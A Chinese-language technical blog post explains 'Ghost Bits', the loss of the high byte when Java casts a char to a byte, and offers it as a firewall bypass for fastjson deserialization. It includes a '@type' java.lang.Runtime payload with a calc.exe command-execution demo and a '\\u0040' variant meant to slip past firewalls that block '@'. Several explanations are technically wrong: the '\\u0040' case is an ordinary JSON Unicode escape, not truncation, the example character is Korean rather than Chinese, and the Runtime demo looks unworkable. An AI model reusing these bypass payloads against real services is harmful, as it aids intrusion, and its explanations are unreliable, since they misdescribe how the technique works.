<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Ghost BitsGhost Bits（幽灵比特位） 是 2026 年 Black Hat Asia 披露的一种 Java 底层类型转换导致的隐蔽绕过攻击面， 地址：i.blackhat.com&#x2F;Asia-26&#x2F;Presentations&#x2F;Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf 核心原理Java 中 char（16 位">
<meta property="og:type" content="article">
<meta property="og:title" content="GhostBits">
<meta property="og:url" content="https://dgxddd.github.io/2026/05/05/GhostBits/">
<meta property="og:site_name" content="jxdgx">
<meta property="og:description" content="Ghost BitsGhost Bits（幽灵比特位） 是 2026 年 Black Hat Asia 披露的一种 Java 底层类型转换导致的隐蔽绕过攻击面， 地址：i.blackhat.com&#x2F;Asia-26&#x2F;Presentations&#x2F;Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf 核心原理Java 中 char（16 位">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/image-20260519210922403.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/image-20260520151336407.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/image-20260520151938381.png">
<meta property="article:published_time" content="2026-05-05T07:25:30.000Z">
<meta property="article:modified_time" content="2026-05-25T13:28:43.440Z">
<meta property="article:author" content="jxdgx">
<meta property="article:tag" content="GhostBits">
<meta property="article:tag" content="java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/image-20260519210922403.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/logo.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/logo.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
        
      
    
    <!-- title -->
    <title>GhostBits | jxdgx</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
<!-- mathjax -->

  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
        inlineMath: [['$','$']],
        displayMath: [['$$','$$'], ['\[','\]']]
      }
    });
  </script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>

<meta name="generator" content="Hexo 8.1.0"></head>

<body class="max-width mx-auto px3 ltr is-post-page">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2026/05/15/CVE-2026-31431%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%92%8C%E5%88%86%E6%9E%90/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2026/04/28/AegisForge/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://dgxddd.github.io/2026/05/05/GhostBits/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://dgxddd.github.io/2026/05/05/GhostBits/&text=GhostBits"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://dgxddd.github.io/2026/05/05/GhostBits/&is_video=false&description=GhostBits"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=GhostBits&body=Check out this article: https://dgxddd.github.io/2026/05/05/GhostBits/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://dgxddd.github.io/2026/05/05/GhostBits/&name=GhostBits&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://dgxddd.github.io/2026/05/05/GhostBits/&t=GhostBits"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Ghost-Bits"><span class="toc-number">1.</span> <span class="toc-text">Ghost Bits</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">核心原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%8B%E5%AD%90%E8%AF%B4%E6%98%8E"><span class="toc-number">1.2.</span> <span class="toc-text">例子说明</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.</span> <span class="toc-text">fastjson反序列化绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE"><span class="toc-number">1.4.</span> <span class="toc-text">参考文献</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        
<div class="post-layout">
  <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
    <header>
      
    <h1 class="posttitle p-name" itemprop="name headline">
        GhostBits
    </h1>



      <div class="meta meta-post">
        
    <div class="postdate">
      
        <time datetime="2026-05-05T07:25:30.000Z" class="dt-published" itemprop="datePublished">2026-05-05</time>
        
      
    </div>


        
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/JAVA%E5%AE%89%E5%85%A8/">JAVA安全</a>
    </div>


        
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/GhostBits/" rel="tag">GhostBits</a>, <a class="p-category" href="/tags/java/" rel="tag">java</a>
    </div>


      </div>
    </header>
    

    <div class="content e-content" itemprop="articleBody">
      <h2 id="Ghost-Bits"><a href="#Ghost-Bits" class="headerlink" title="Ghost Bits"></a>Ghost Bits</h2><p><strong>Ghost Bits（幽灵比特位）</strong> 是 2026 年 Black Hat Asia 披露的一种 Java 底层类型转换导致的<strong>隐蔽绕过攻击面</strong>，</p>
<p>地址：<a target="_blank" rel="noopener" href="https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf">i.blackhat.com&#x2F;Asia-26&#x2F;Presentations&#x2F;Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf</a></p>
<h3 id="核心原理"><a href="#核心原理" class="headerlink" title="核心原理"></a>核心原理</h3><p>Java 中 <code>char</code>（16 位 UTF-16）转 <code>byte</code>（8 位）时，<strong>高 8 位被静默丢弃、仅留低 8 位</strong>；这些被丢掉的高位就叫 Ghost Bits。</p>
<h3 id="例子说明"><a href="#例子说明" class="headerlink" title="例子说明"></a>例子说明</h3><p>比如下面这个java代码，0xC22F是<code>숯</code>，而整体字符：<code>0xC2</code>（高位） + <code>0x2F</code>（低位 &#x3D; 真正的<code>/</code>）</p>
<p>WAF 看到就是一个看不懂的<strong>冷门生僻汉字</strong>，过滤直接放行,而Java 后端一处理强转 byte 直接<strong>丢掉高位 0xC2</strong>，只剩低位<code>0x2F</code>自动变回 <strong><code>/</code></strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">GhostBits</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="type">char</span> <span class="variable">ghost</span> <span class="operator">=</span> <span class="number">0xC22F</span>;</span><br><span class="line">        <span class="comment">// 后端强制转字节</span></span><br><span class="line">        <span class="type">byte</span> <span class="variable">real</span> <span class="operator">=</span> (<span class="type">byte</span>) ghost;</span><br><span class="line"></span><br><span class="line">        System.out.println(<span class="string">&quot;浏览器看到的字符：&quot;</span>+ghost);</span><br><span class="line">        System.out.println(<span class="string">&quot;Java实际解析出：&quot;</span>+(<span class="type">char</span>)real);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/image-20260519210922403.png" alt="image-20260519210922403"></p>
<h3 id="fastjson反序列化绕过"><a href="#fastjson反序列化绕过" class="headerlink" title="fastjson反序列化绕过"></a>fastjson反序列化绕过</h3><p>现在写个简单的例子就如下面这个就是可以很简单的弹出计算器</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">FastJsonCalc</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">json</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;java.lang.Runtime\&quot;&#125;&quot;</span>;</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> (Runtime) JSON.parse(json);</span><br><span class="line">        runtime.exec(<span class="string">&quot;calc.exe&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/image-20260520151336407.png" alt="image-20260520151336407"></p>
<p>但是当对方得WAF禁用@得时候我们这个时候就可以使用我们得新方法Ghost Bits。</p>
<p>使用\u0040得时候，java的特性，char转byte，只保留低8位，高位直接丢弃。\u0040的00被丢弃，而40就保留变成了@</p>
<p>这个时候WAF看见\u0040没有@就进行的放行，在到java的时候就砍掉了00高位变成了@就实现了绕过</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">FastJsonCalc</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">json</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;\\u0040type\&quot;:\&quot;java.lang.Runtime\&quot;&#125;&quot;</span>;</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> (Runtime) JSON.parse(json);</span><br><span class="line">        runtime.exec(<span class="string">&quot;calc.exe&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/image-20260520151938381.png" alt="image-20260520151938381"></p>
<p>还有很多这样的问题这个就使用这一个进行举例，可以去尝试一下</p>
<h3 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h3><p><a target="_blank" rel="noopener" href="https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf">i.blackhat.com&#x2F;Asia-26&#x2F;Presentations&#x2F;Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf</a></p>

    </div>
  </article>
  
    <aside class="post-sidebar-toc">
      <div class="post-sidebar-toc-inner">
        <div class="post-sidebar-toc-title">Contents</div>
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Ghost-Bits"><span class="toc-number">1.</span> <span class="toc-text">Ghost Bits</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">核心原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%8B%E5%AD%90%E8%AF%B4%E6%98%8E"><span class="toc-number">1.2.</span> <span class="toc-text">例子说明</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.</span> <span class="toc-text">fastjson反序列化绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE"><span class="toc-number">1.4.</span> <span class="toc-text">参考文献</span></a></li></ol></li></ol>
      </div>
    </aside>
  
</div>




        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a href="/categories/">分类</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </div>

    
    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Ghost-Bits"><span class="toc-number">1.</span> <span class="toc-text">Ghost Bits</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">核心原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%8B%E5%AD%90%E8%AF%B4%E6%98%8E"><span class="toc-number">1.2.</span> <span class="toc-text">例子说明</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.</span> <span class="toc-text">fastjson反序列化绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE"><span class="toc-number">1.4.</span> <span class="toc-text">参考文献</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://dgxddd.github.io/2026/05/05/GhostBits/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://dgxddd.github.io/2026/05/05/GhostBits/&text=GhostBits"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://dgxddd.github.io/2026/05/05/GhostBits/&is_video=false&description=GhostBits"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=GhostBits&body=Check out this article: https://dgxddd.github.io/2026/05/05/GhostBits/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://dgxddd.github.io/2026/05/05/GhostBits/&title=GhostBits"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://dgxddd.github.io/2026/05/05/GhostBits/&name=GhostBits&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://dgxddd.github.io/2026/05/05/GhostBits/&t=GhostBits"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    jxdgx
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


<link rel="stylesheet" href="/css/custom.css">

    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<script src="/js/custom.js"></script>
<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


</body>
</html>
